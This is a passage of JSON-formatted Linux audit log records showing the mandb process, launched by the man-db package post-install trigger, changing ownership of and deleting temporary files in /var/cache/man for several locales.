"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9b0b70",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/sv"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fi/CACHEDIR.TAG",
"inode": 276951,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:739",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sv"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fi/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:740",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/fi"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/fi/",
"inode": 266943,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/fi/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:741",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f923d90",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/fi"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/it/CACHEDIR.TAG",
"inode": 276952,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:742",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/fi"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/it/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:743",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/it"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/it/",
"inode": 266947,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/it/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:744",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f97e140",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/it"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/hu/CACHEDIR.TAG",
"inode": 276953,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:745",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/it"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/hu/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:746",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/hu"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/hu/",
"inode": 266945,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/hu/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:747",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f923d90",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/hu"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sl/CACHEDIR.TAG",
"inode": 276954,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:748",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/hu"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.425:749",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/sl/",
"inode": 266955,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/sl/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:750",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a4b10",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/sl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/tr/CACHEDIR.TAG",
"inode": 276955,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:751",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/sl"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/tr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:752",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/tr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/tr/",
"inode": 266958,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/tr/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:753",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f958dd0",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/tr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/da/CACHEDIR.TAG",
"inode": 276956,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:754",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f8a76d0",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/tr"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/da/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:755",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "delete",
"ARGV": [
"0x55cf8f9a6dc0",
"0x7ffc63757b30",
"0x6",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/da"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/da/",
"inode": 266940,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/cache/man/da/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:756",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f972540",
"0x1a4",
"0x6",
"0x0"
]
},
"CWD": {
"cwd": "/usr/share/man/da"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/es/CACHEDIR.TAG",
"inode": 276957,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:757",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
"uid": 6,
"gid": 12,
"euid": 6,
"suid": 6,
"fsuid": 6,
"egid": 12,
"sgid": 12,
"fsgid": 12,
"tty": "pts1",
"ses": 3,
"comm": "mandb",
"exe": "/usr/bin/mandb",
"key": "perm_mod",
"ARGV": [
"0x55cf8f9a6dc0",
"0x1a4",
"0x55cf8f9b9560",
"0x55cf8f800010"
]
},
"CWD": {
"cwd": "/usr/share/man/da"
},
"PATH": [
{
"item": 0,
"name": "/var/cache/man/es/7654",
"inode": 277003,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 6,
"ogid": 12,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"perl",
"-e",
"@pwd = getpwnam(\"man\"); $) = $( = $pwd[3]; $> = $< = $pwd[2];%0a%09 exec \"/usr/bin/mandb\", @ARGV",
"--",
"-pq"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/var/lib/dpkg/info/man-db.postinst",
"triggered",
"/usr/share/man"
],
"launch_time": 1632470478.093,
"ppid": 7652
}
}
{
"ID": "1632470478.429:758",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7653,
"pid": 7654,
"auid": 1000,
